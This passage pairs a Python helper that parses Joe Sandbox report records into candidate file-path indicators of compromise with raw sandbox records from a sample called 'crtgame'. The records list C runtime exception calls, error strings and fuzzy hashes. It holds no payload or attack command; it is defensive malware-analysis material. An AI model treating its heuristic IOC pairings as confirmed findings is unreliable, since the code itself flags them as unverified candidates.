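"""
import re
from dataclasses import dataclass
from typing import List, Optional

# CSIDL values from shlobj.h, with the folder each resolves to on a default
# Windows install written in environment-variable form.
CSIDL_FLAG_CREATE = 0x8000
CSIDL_NAMES = {
    0x0005: ("CSIDL_PERSONAL", r"%USERPROFILE%\Documents"),
    0x0007: ("CSIDL_STARTUP", r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"),
    0x0018: ("CSIDL_COMMON_STARTUP", r"%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"),
    0x001A: ("CSIDL_APPDATA", r"%APPDATA%"),
    0x001C: ("CSIDL_LOCAL_APPDATA", r"%LOCALAPPDATA%"),
    0x0023: ("CSIDL_COMMON_APPDATA", r"%ProgramData%"),
    0x0024: ("CSIDL_WINDOWS", r"%SystemRoot%"),
    0x0025: ("CSIDL_SYSTEM", r"%SystemRoot%\System32"),
    0x0026: ("CSIDL_PROGRAM_FILES", r"%ProgramFiles%"),
}

# One report line: optional bullet, optional 'Part of subcall function XXXXXXXX:',
# then Api.MODULE, an optional (arg,arg,?) list, and the call-site 'ref:' address.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function\s+(?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w:@]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[Optional[int]]   # resolved 32-bit stack values; None where the report shows '?'
    ref: int                    # address of the call site
    caller: Optional[int]       # address of the subcall function, or None for a direct call


def parse_api_line(line: str) -> Optional[ApiRef]:
    """Return an ApiRef for a report API line, or None for any other line."""
    m = API_LINE.match(line)
    if not m:
        return None
    args: List[Optional[int]] = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            tok = tok.strip()
            args.append(int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None)
    caller = m.group("caller")
    return ApiRef(m.group("api"), m.group("module"), args,
                  int(m.group("ref"), 16), int(caller, 16) if caller else None)


def parse_record(lines):
    """Split one function record into (api refs, strings).

    Strings come from the 'Strings' section and from the 'String ID' line,
    which joins several strings with '$'; duplicates are kept once."""
    refs, strings, section = [], [], None

    def add_string(s):
        s = s.strip()
        if s and s not in strings:
            strings.append(s)

    for line in lines:
        s = line.strip()
        if s in ("APIs", "Strings"):
            section = s
            continue
        if s in ("Memory Dump Source", "Similarity", "Yara matches"):
            section = None
            continue
        if s.startswith("• String ID:"):
            for part in s.split(":", 1)[1].split("$"):
                add_string(part)
        elif section == "APIs":
            ref = parse_api_line(s)
            if ref:
                refs.append(ref)
        elif section == "Strings" and s.startswith("•"):
            add_string(s.lstrip("• ").split(", xrefs:")[0])
    return refs, strings


def folder_path_iocs(refs, strings):
    """Pair each SHGetSpecialFolderPath*/SHGetFolderPath* CSIDL argument with the
    record's backslash-prefixed strings. Co-location in one function is a
    heuristic, not data flow, so the results are candidates to confirm."""
    iocs = []
    for r in refs:
        if r.api.startswith("SHGetSpecialFolderPath"):
            idx = 2          # (hwnd, lpszPath, csidl, fCreate)
        elif r.api.startswith("SHGetFolderPath"):
            idx = 1          # (hwnd, csidl, hToken, dwFlags, pszPath)
        else:
            continue
        if len(r.args) <= idx or r.args[idx] is None:
            continue
        csidl = r.args[idx]
        known = CSIDL_NAMES.get(csidl & ~CSIDL_FLAG_CREATE)
        if not known:
            continue
        name, base = known
        for s in strings:
            if s.startswith("\\"):
                iocs.append({"csidl": name, "create": bool(csidl & CSIDL_FLAG_CREATE),
                             "path": base + s, "ref": r.ref})
    return iocs


# Constructed input: the SHGetSpecialFolderPathA record from this report.
SAVE_DAT_RECORD = [
    "APIs",
    "• _malloc.LIBCMT ref: 02C45288",
    "  • Part of subcall function 02C529AC: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001), ref: 02C529EF",
    "• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00002000,"
    "00000000,00000001,00000000,00000000,?,02C475B2), ref: 02C4529A",
    "Strings",
    "Memory Dump Source",
    "• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false",
    "Similarity",
    "• API ID: AllocateFolderHeapPathSpecial_malloc",
    r"• String ID: \save.dat",
    "• API String ID: 4128168839-3580179773",
]

if __name__ == "__main__":
    refs, strs = parse_record(SAVE_DAT_RECORD)
    for ioc in folder_path_iocs(refs, strs):
        print(ioc)
```

Running the block on the record above yields one candidate, CSIDL_COMMON_APPDATA plus \save.dat with the create flag clear; the fourth argument (fCreate) is 0 in the record, so the folder is only resolved, and whether the file is actually written has to be confirmed against the report's file-system activity rather than inferred from this call alone.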
APIs
• __EH_prolog.LIBCMT ref: 02C4396A
• std::runtime_error::runtime_error.LIBCPMT ref: 02C439C1
  • Part of subcall function 02C41410: std::exception::exception.LIBCMT ref: 02C41428
  • Part of subcall function 02C49FA7: __EH_prolog.LIBCMT ref: 02C49FAC
  • Part of subcall function 02C49FA7: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C49FBB
  • Part of subcall function 02C49FA7: __CxxThrowException@8.LIBCMT ref: 02C49FDA
Strings
• Day of month is not valid for year, xrefs: 02C439AC
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
• String ID: Day of month is not valid for year
• API String ID: 1404951899-1521898139
• Opcode ID: 115c1e7eb7f00c7514ba3144c1cabaade9fc8891796453c6f99dbb89283086b8
• Instruction ID: a9c2b8830fc90c821c3336aeffc8edd6893d2e43df4ae26322702be351a12f34
• Opcode Fuzzy Hash: 115c1e7eb7f00c7514ba3144c1cabaade9fc8891796453c6f99dbb89283086b8
• Instruction Fuzzy Hash: E901B176910249AADF04EFA4D845AFFB779FF58710F40411AEC04A3200EB708A45DB95
APIs
• std::exception::exception.LIBCMT ref: 02C4F510
• __CxxThrowException@8.LIBCMT ref: 02C4F525
  • Part of subcall function 02C5354C: _malloc.LIBCMT ref: 02C53564
Strings
Memory Dump Source
• Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw_mallocstd::exception::exception
• String ID: bad allocation
• API String ID: 4063778783-2104205924
• Opcode ID: 1fba1d0dd2cabf542241099b6382b248a69e113057258154909c886d81c0b58a
• Instruction ID: 89e216b612bb3c139a423d7be20c112cf924dc741fc67cf3e2d1eccc79753a99
• Opcode Fuzzy Hash: 1fba1d0dd2cabf542241099b6382b248a69e113057258154909c886d81c0b58a
• Instruction Fuzzy Hash: A4F02EB068030D679F04EAA8895CABF77FC9B40340B4005A6E915D3180EF70E7408994
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C43C1B
                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 02C43C30
                                                                                      • Part of subcall function 02C51EB7: std::exception::exception.LIBCMT ref: 02C51EC1
                                                                                      • Part of subcall function 02C49FE0: __EH_prolog.LIBCMT ref: 02C49FE5
                                                                                      • Part of subcall function 02C49FE0: __CxxThrowException@8.LIBCMT ref: 02C4A00E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                    • String ID: bad cast
                                                                                    • API String ID: 1300498068-3145022300
                                                                                    • Opcode ID: 6f5b9b05887d76fe66ca95522c137e85052b9afec78caf12c2839edc0e7ac55a
                                                                                    • Instruction ID: eb20b6db824aa8039ece66942f2b73e2a9207fcbbea95cce786f22613c8158bf
                                                                                    • Opcode Fuzzy Hash: 6f5b9b05887d76fe66ca95522c137e85052b9afec78caf12c2839edc0e7ac55a
                                                                                    • Instruction Fuzzy Hash: E3F0A072E005048BCB19EF58D484AEBB775EF62355F1001AEED065B240CBB29A46DAD1
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C438D2
                                                                                    • std::runtime_error::runtime_error.LIBCPMT ref: 02C438F1
                                                                                      • Part of subcall function 02C41410: std::exception::exception.LIBCMT ref: 02C41428
                                                                                    Strings
                                                                                    • Year is out of valid range: 1400..10000, xrefs: 02C438E0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                    • String ID: Year is out of valid range: 1400..10000
                                                                                    • API String ID: 2067857976-2344417016
                                                                                    • Opcode ID: cbd41c7608f0114675fc457af90eaa1731f8ba73766c0b3cf842de10118f46be
                                                                                    • Instruction ID: 227ff45a96d7f7eee4394d72845a0864863d815a025ed1153a76d73ec0b6cbb5
                                                                                    • Opcode Fuzzy Hash: cbd41c7608f0114675fc457af90eaa1731f8ba73766c0b3cf842de10118f46be
                                                                                    • Instruction Fuzzy Hash: FFE0D8B2F4011457DB28EF98CC597FEB7B9DB08750F00015AE80563280DFB11948DB90
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C43886
                                                                                    • std::runtime_error::runtime_error.LIBCPMT ref: 02C438A5
                                                                                      • Part of subcall function 02C41410: std::exception::exception.LIBCMT ref: 02C41428
                                                                                    Strings
                                                                                    • Day of month value is out of range 1..31, xrefs: 02C43894
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                    • String ID: Day of month value is out of range 1..31
                                                                                    • API String ID: 2067857976-1361117730
                                                                                    • Opcode ID: 3424bb86ece50d2e34fcc69948c0e18bd571489a510702fcb0a639280dcaf851
                                                                                    • Instruction ID: ce85be5b7f7addcc3de692d6a58542ca31848861dd05214976f187112ec6b5ab
                                                                                    • Opcode Fuzzy Hash: 3424bb86ece50d2e34fcc69948c0e18bd571489a510702fcb0a639280dcaf851
                                                                                    • Instruction Fuzzy Hash: 19E0D8B2F4011497DB24EF94CC997FEB779DB08750F00055AE80573280DFB11944DB90
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C4391E
                                                                                    • std::runtime_error::runtime_error.LIBCPMT ref: 02C4393D
                                                                                      • Part of subcall function 02C41410: std::exception::exception.LIBCMT ref: 02C41428
                                                                                    Strings
                                                                                    • Month number is out of range 1..12, xrefs: 02C4392C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                    • String ID: Month number is out of range 1..12
                                                                                    • API String ID: 2067857976-4198407886
                                                                                    • Opcode ID: 3481e647ac04a594a66bc011c362d312d376a8efa1dacfbfe4045887f445dda1
                                                                                    • Instruction ID: 66c923bb320ee6d6257e07c8079fa463bb3ac6ddc6c34bfba5995ce92ad4107a
                                                                                    • Opcode Fuzzy Hash: 3481e647ac04a594a66bc011c362d312d376a8efa1dacfbfe4045887f445dda1
                                                                                    • Instruction Fuzzy Hash: EDE092B2A4421457D724AB9488597EEB779DB08750F00015AE80563280DFB119449B91
                                                                                    APIs
                                                                                    • TlsAlloc.KERNEL32 ref: 02C419CC
                                                                                    • GetLastError.KERNEL32 ref: 02C419D9
                                                                                      • Part of subcall function 02C41712: __EH_prolog.LIBCMT ref: 02C41717
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocErrorH_prologLast
                                                                                    • String ID: tss
                                                                                    • API String ID: 249634027-1638339373
                                                                                    • Opcode ID: 9ad2515cb3854490d229e71f73ecbb5655d0fd3c6a6e40d0d9430b1fedd59aea
                                                                                    • Instruction ID: 88cda5dafffea7f2852efbc41c734ee55bdb6e0dca8b4fb06655dfbc4fd7118f
                                                                                    • Opcode Fuzzy Hash: 9ad2515cb3854490d229e71f73ecbb5655d0fd3c6a6e40d0d9430b1fedd59aea
                                                                                    • Instruction Fuzzy Hash: 59E08631D042145BC2007B78980C19BBB94DA44234F104B66EDED833D0EF7189949BD6
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C43BD8
                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 02C43BED
                                                                                      • Part of subcall function 02C51EB7: std::exception::exception.LIBCMT ref: 02C51EC1
                                                                                      • Part of subcall function 02C49FE0: __EH_prolog.LIBCMT ref: 02C49FE5
                                                                                      • Part of subcall function 02C49FE0: __CxxThrowException@8.LIBCMT ref: 02C4A00E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                    • String ID: bad cast
                                                                                    • API String ID: 1300498068-3145022300
                                                                                    • Opcode ID: 752f70d3624232e829ccb8e9d8890820c1700f11ce6443607ceabd1b09f3caeb
                                                                                    • Instruction ID: 1db9ee6b1eb7979cde43dc1cbfd1f2bb6584d0233e88af80deec6a6276e630b0
                                                                                    • Opcode Fuzzy Hash: 752f70d3624232e829ccb8e9d8890820c1700f11ce6443607ceabd1b09f3caeb
                                                                                    • Instruction Fuzzy Hash: 3DE0D6B0E00108DBCB28EF54D989BBEBB71EF21304F1081ACAC0647780CF718A46CE82